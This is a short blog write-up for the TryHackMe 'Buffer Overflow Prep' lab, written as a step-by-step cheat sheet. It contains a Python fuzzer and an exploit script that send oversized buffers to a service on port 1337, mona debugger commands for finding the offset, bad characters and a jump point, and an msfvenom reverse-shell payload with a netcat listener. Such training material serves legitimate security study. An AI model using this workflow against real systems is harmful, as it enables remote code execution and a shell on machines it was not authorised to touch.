---
title: TryHackMe - Buffer Overflow Prep
author: Devin Cudnohufsky
date: 2021-10-02 00:00:00 +0500
categories: [Write-Ups]
tags: [immunity, mona, c]
---

## Fuzz for Overflow Vulnerability

`!mona config -set workingfolder c:\mona\%p`

```
#!/usr/bin/env python3

import socket, time, sys

ip = "<VM IP Here>"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)
```

`python3 fuzzer.py`

## Get offset

```
import socket

ip = "<VM IP Here>"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")
```

`/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <Crash Bytes + 400>`

`!mona findmsp -distance <Crash Bytes + 400>`

## Find Bad Chars

`!mona bytearray -b "\x00"`

```
listRem = "\\x00".split("\\x")
for x in range(1, 256):
    if "{:02x}".format(x) not in listRem:
        print("\\x" + "{:02x}".format(x), end='')
print()
```

`!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP Address>`

## Find Jump Point

`!mona jmp -r esp -cpb "<Found Bad Chars>"`

## Exploit

### Payload

`msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4444 EXITFUNC=thread -b "<Found Bad Chars>" -f c`

### Add NOPS

`padding = "\x90" * 16`

### Exploit

`nc -nvlp 4444`
`python3 exploit.py`
